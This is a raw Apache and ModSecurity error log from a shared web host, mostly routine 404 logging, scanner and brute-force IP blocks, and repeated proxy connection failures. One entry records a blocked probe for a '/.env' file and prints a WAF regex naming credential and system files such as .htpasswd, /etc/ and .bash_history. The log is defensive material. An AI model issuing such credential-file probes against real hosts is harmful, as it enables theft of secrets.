[Tue May 26 15:40:05.191968 2026] [security2:error] [pid 733610:tid 733814] [client 91.242.236.238:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVxfcLL_4PasUNKBsfM3QAAAEo"], referer: https://www.anujtradingco.com/
[Tue May 26 15:40:05.221577 2026] [security2:error] [pid 733610:tid 733755] [client 158.62.210.107:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVxfcLL_4PasUNKBsfM4wAAAA8"], referer: https://www.anujtradingco.com/
[Tue May 26 15:40:05.494400 2026] [security2:error] [pid 733610:tid 733767] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxfcLL_4PasUNKBsfM2AAAABs"]
[Tue May 26 15:40:05.816476 2026] [security2:error] [pid 733610:tid 733801] [client 5.255.126.59:38254] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxfcLL_4PasUNKBsfM8wAAAD0"], referer: https://bloggertarget.com/build/manifest.json
[Tue May 26 15:40:06.045167 2026] [security2:error] [pid 733610:tid 733753] [client 195.178.110.34:42696] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/portal/.env"] [unique_id "ahVxfsLL_4PasUNKBsfM-wAAAA0"]
[Tue May 26 15:40:06.158677 2026] [security2:error] [pid 733610:tid 733835] [client 91.242.236.238:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVxfsLL_4PasUNKBsfNAQAAAF8"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1440498&moderation-hash=735983836e1e6bd28c4a4e81e576fedc
[Tue May 26 15:40:06.302901 2026] [security2:error] [pid 733610:tid 733625] [remote 216.73.216.30:48232] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahVxfsLL_4PasUNKBsfNAgAAaw4"]
[Tue May 26 15:40:06.474615 2026] [security2:error] [pid 733610:tid 733812] [client 158.62.210.107:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVxfsLL_4PasUNKBsfNDgAAAEg"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1445443&moderation-hash=90dfb85c217fa15997afe9c74f007389
[Tue May 26 15:40:07.702672 2026] [security2:error] [pid 733610:tid 733816] [client 5.255.126.59:38272] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxf8LL_4PasUNKBsfNKgAAAEw"]
[Tue May 26 15:40:07.738311 2026] [security2:error] [pid 733610:tid 733815] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxf8LL_4PasUNKBsfNIwAAAEs"]
[Tue May 26 15:40:07.846988 2026] [security2:error] [pid 733610:tid 733843] [client 103.153.130.62:56746] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVxf8LL_4PasUNKBsfNNAAAAGc"]
[Tue May 26 15:40:07.847112 2026] [security2:error] [pid 733610:tid 733843] [client 103.153.130.62:56746] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVxf8LL_4PasUNKBsfNNAAAAGc"]
[Tue May 26 15:40:08.214562 2026] [security2:error] [pid 733610:tid 733861] [client 5.255.126.59:38254] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxgMLL_4PasUNKBsfNPQAAAHk"], referer: https://bloggertarget.com/.vite/manifest.json
[Tue May 26 15:40:08.679722 2026] [security2:error] [pid 733610:tid 733844] [client 5.255.126.59:38272] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxgMLL_4PasUNKBsfNSwAAAGg"]
[Tue May 26 15:40:09.146212 2026] [security2:error] [pid 733610:tid 733866] [client 5.255.126.59:38254] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxgMLL_4PasUNKBsfNUgAAAH4"], referer: https://bloggertarget.com/dist/manifest.json
[Tue May 26 15:40:09.907894 2026] [security2:error] [pid 733610:tid 733791] [client 5.255.126.59:38272] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxgcLL_4PasUNKBsfNaAAAADM"]
[Tue May 26 15:40:09.948549 2026] [security2:error] [pid 733610:tid 733854] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxgcLL_4PasUNKBsfNYgAAAHI"]
[Tue May 26 15:40:10.761110 2026] [security2:error] [pid 733610:tid 733780] [client 5.255.126.59:38254] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxgsLL_4PasUNKBsfNgAAAACg"], referer: https://bloggertarget.com/dist/.vite/manifest.json
[Tue May 26 15:40:11.244552 2026] [security2:error] [pid 733610:tid 733818] [client 5.255.126.59:38272] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxg8LL_4PasUNKBsfNlAAAAE4"]
[Tue May 26 15:40:11.280810 2026] [security2:error] [pid 733610:tid 733746] [client 14.239.11.152:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxgsLL_4PasUNKBsfNiQAAAAY"]
[Tue May 26 15:40:11.936925 2026] [security2:error] [pid 733610:tid 733777] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxg8LL_4PasUNKBsfNpgAAACU"]
[Tue May 26 15:40:12.028167 2026] [security2:error] [pid 733610:tid 733806] [client 49.13.134.145:21042] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahVxg8LL_4PasUNKBsfNpQAAAEI"], referer: https://thegoodsporting.com
[Tue May 26 15:40:12.041123 2026] [security2:error] [pid 733610:tid 733846] [client 5.255.126.59:38254] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxg8LL_4PasUNKBsfNsAAAAGo"], referer: https://bloggertarget.com/_nuxt/manifest.json
[Tue May 26 15:40:12.248843 2026] [security2:error] [pid 733610:tid 733641] [remote 103.145.62.145:30629] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 145.62.145.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahVxhMLL_4PasUNKBsfNsQAAUB4"]
[Tue May 26 15:40:13.128509 2026] [security2:error] [pid 733610:tid 733851] [client 192.178.8.101:38027] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 101.8.178.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahVxhcLL_4PasUNKBsfNzQAAAG8"]
[Tue May 26 15:40:13.323287 2026] [security2:error] [pid 733610:tid 733762] [client 5.255.126.59:38272] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxhcLL_4PasUNKBsfN0QAAABY"]
[Tue May 26 15:40:13.947993 2026] [security2:error] [pid 733610:tid 733777] [client 5.255.126.59:38254] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxhcLL_4PasUNKBsfN4wAAACU"], referer: https://bloggertarget.com/_nuxt/builds/latest.json
[Tue May 26 15:40:14.231718 2026] [security2:error] [pid 733610:tid 733752] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxhcLL_4PasUNKBsfN6gAAAAw"]
[Tue May 26 15:40:14.284016 2026] [proxy:error] [pid 733610:tid 733754] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:14.284074 2026] [proxy_http:error] [pid 733610:tid 733754] [client 142.248.80.222:61258] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:14.284677 2026] [proxy:error] [pid 733610:tid 733754] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:14.284725 2026] [proxy_http:error] [pid 733610:tid 733754] [client 142.248.80.222:61258] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:14.550467 2026] [security2:error] [pid 733610:tid 733757] [client 5.255.126.59:38272] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxhsLL_4PasUNKBsfN-wAAABE"]
[Tue May 26 15:40:15.138245 2026] [security2:error] [pid 733610:tid 733815] [client 5.255.126.59:38254] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxhsLL_4PasUNKBsfODQAAAEs"], referer: https://bloggertarget.com/.astro/manifest.json
[Tue May 26 15:40:15.914072 2026] [security2:error] [pid 733610:tid 733821] [client 5.255.126.59:38272] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxh8LL_4PasUNKBsfOIwAAAFE"]
[Tue May 26 15:40:16.795997 2026] [security2:error] [pid 733610:tid 733747] [client 5.255.126.59:38254] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxiMLL_4PasUNKBsfOQAAAAAc"], referer: https://bloggertarget.com/static/manifest.json
[Tue May 26 15:40:16.870070 2026] [proxy:error] [pid 733610:tid 733845] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.870141 2026] [proxy_http:error] [pid 733610:tid 733845] [client 142.248.80.222:61572] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.870235 2026] [proxy:error] [pid 733610:tid 733828] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.870290 2026] [proxy_http:error] [pid 733610:tid 733828] [client 142.248.80.222:61558] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.870819 2026] [proxy:error] [pid 733610:tid 733845] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.870864 2026] [proxy_http:error] [pid 733610:tid 733845] [client 142.248.80.222:61572] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.870943 2026] [proxy:error] [pid 733610:tid 733828] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.870996 2026] [proxy_http:error] [pid 733610:tid 733828] [client 142.248.80.222:61558] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.871202 2026] [proxy:error] [pid 733610:tid 733830] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.871276 2026] [proxy_http:error] [pid 733610:tid 733830] [client 142.248.80.222:61550] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.871646 2026] [proxy:error] [pid 733610:tid 733786] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.871727 2026] [proxy_http:error] [pid 733610:tid 733786] [client 142.248.80.222:61516] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.871978 2026] [proxy:error] [pid 733610:tid 733830] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.872018 2026] [proxy_http:error] [pid 733610:tid 733830] [client 142.248.80.222:61550] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.872321 2026] [proxy:error] [pid 733610:tid 733786] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.872381 2026] [proxy_http:error] [pid 733610:tid 733786] [client 142.248.80.222:61516] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.889117 2026] [proxy:error] [pid 733610:tid 733764] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.889166 2026] [proxy_http:error] [pid 733610:tid 733764] [client 142.248.80.222:61536] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.889754 2026] [proxy:error] [pid 733610:tid 733764] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.889786 2026] [proxy_http:error] [pid 733610:tid 733764] [client 142.248.80.222:61536] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.889962 2026] [proxy:error] [pid 733610:tid 733809] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.890008 2026] [proxy_http:error] [pid 733610:tid 733809] [client 142.248.80.222:61520] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.890658 2026] [proxy:error] [pid 733610:tid 733809] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.890705 2026] [proxy_http:error] [pid 733610:tid 733809] [client 142.248.80.222:61520] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.892078 2026] [proxy:error] [pid 733610:tid 733740] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.892139 2026] [proxy_http:error] [pid 733610:tid 733740] [client 142.248.80.222:61484] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.892779 2026] [proxy:error] [pid 733610:tid 733740] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.892821 2026] [proxy_http:error] [pid 733610:tid 733740] [client 142.248.80.222:61484] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.893282 2026] [proxy:error] [pid 733610:tid 733742] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.893332 2026] [proxy_http:error] [pid 733610:tid 733742] [client 142.248.80.222:61500] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.893831 2026] [proxy:error] [pid 733610:tid 733748] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.893875 2026] [proxy_http:error] [pid 733610:tid 733748] [client 142.248.80.222:61462] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.893992 2026] [proxy:error] [pid 733610:tid 733742] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.894045 2026] [proxy_http:error] [pid 733610:tid 733742] [client 142.248.80.222:61500] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.894455 2026] [proxy:error] [pid 733610:tid 733748] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.894488 2026] [proxy_http:error] [pid 733610:tid 733748] [client 142.248.80.222:61462] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.895547 2026] [proxy:error] [pid 733610:tid 733791] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.895640 2026] [proxy_http:error] [pid 733610:tid 733791] [client 142.248.80.222:61472] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.896152 2026] [proxy:error] [pid 733610:tid 733847] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.896192 2026] [proxy_http:error] [pid 733610:tid 733847] [client 142.248.80.222:61450] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.896754 2026] [proxy:error] [pid 733610:tid 733791] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.896856 2026] [proxy_http:error] [pid 733610:tid 733791] [client 142.248.80.222:61472] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.896945 2026] [proxy:error] [pid 733610:tid 733847] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.896983 2026] [proxy_http:error] [pid 733610:tid 733847] [client 142.248.80.222:61450] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.897841 2026] [proxy:error] [pid 733610:tid 733787] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.897887 2026] [proxy_http:error] [pid 733610:tid 733787] [client 142.248.80.222:61448] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.898479 2026] [proxy:error] [pid 733610:tid 733787] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.898519 2026] [proxy_http:error] [pid 733610:tid 733787] [client 142.248.80.222:61448] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.898605 2026] [proxy:error] [pid 733610:tid 733856] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.898675 2026] [proxy_http:error] [pid 733610:tid 733856] [client 142.248.80.222:61440] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.899244 2026] [proxy:error] [pid 733610:tid 733856] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.899278 2026] [proxy_http:error] [pid 733610:tid 733856] [client 142.248.80.222:61440] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.901476 2026] [proxy:error] [pid 733610:tid 733816] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.901519 2026] [proxy_http:error] [pid 733610:tid 733816] [client 142.248.80.222:61432] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.901722 2026] [proxy:error] [pid 733610:tid 733789] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.901768 2026] [proxy_http:error] [pid 733610:tid 733789] [client 142.248.80.222:61412] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.902145 2026] [proxy:error] [pid 733610:tid 733816] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.902183 2026] [proxy_http:error] [pid 733610:tid 733816] [client 142.248.80.222:61432] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.902344 2026] [proxy:error] [pid 733610:tid 733789] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.902389 2026] [proxy_http:error] [pid 733610:tid 733789] [client 142.248.80.222:61412] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.902914 2026] [proxy:error] [pid 733610:tid 733778] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.902962 2026] [proxy_http:error] [pid 733610:tid 733778] [client 142.248.80.222:61422] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.903783 2026] [proxy:error] [pid 733610:tid 733778] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.903825 2026] [proxy_http:error] [pid 733610:tid 733778] [client 142.248.80.222:61422] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.904453 2026] [proxy:error] [pid 733610:tid 733850] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.904494 2026] [proxy_http:error] [pid 733610:tid 733850] [client 142.248.80.222:61376] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.904727 2026] [proxy:error] [pid 733610:tid 733829] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.904773 2026] [proxy_http:error] [pid 733610:tid 733829] [client 142.248.80.222:61406] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.905082 2026] [proxy:error] [pid 733610:tid 733850] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.905113 2026] [proxy_http:error] [pid 733610:tid 733850] [client 142.248.80.222:61376] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.905328 2026] [proxy:error] [pid 733610:tid 733763] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.905390 2026] [proxy_http:error] [pid 733610:tid 733763] [client 142.248.80.222:61370] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.905498 2026] [proxy:error] [pid 733610:tid 733842] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.905545 2026] [proxy_http:error] [pid 733610:tid 733842] [client 142.248.80.222:61390] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.905667 2026] [proxy:error] [pid 733610:tid 733829] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.905717 2026] [proxy_http:error] [pid 733610:tid 733829] [client 142.248.80.222:61406] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.906243 2026] [proxy:error] [pid 733610:tid 733763] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.906292 2026] [proxy_http:error] [pid 733610:tid 733763] [client 142.248.80.222:61370] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.906428 2026] [proxy:error] [pid 733610:tid 733842] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.906474 2026] [proxy_http:error] [pid 733610:tid 733842] [client 142.248.80.222:61390] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.907198 2026] [proxy:error] [pid 733610:tid 733850] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.907235 2026] [proxy_http:error] [pid 733610:tid 733850] [client 142.248.80.222:61356] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.907699 2026] [proxy:error] [pid 733610:tid 733825] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
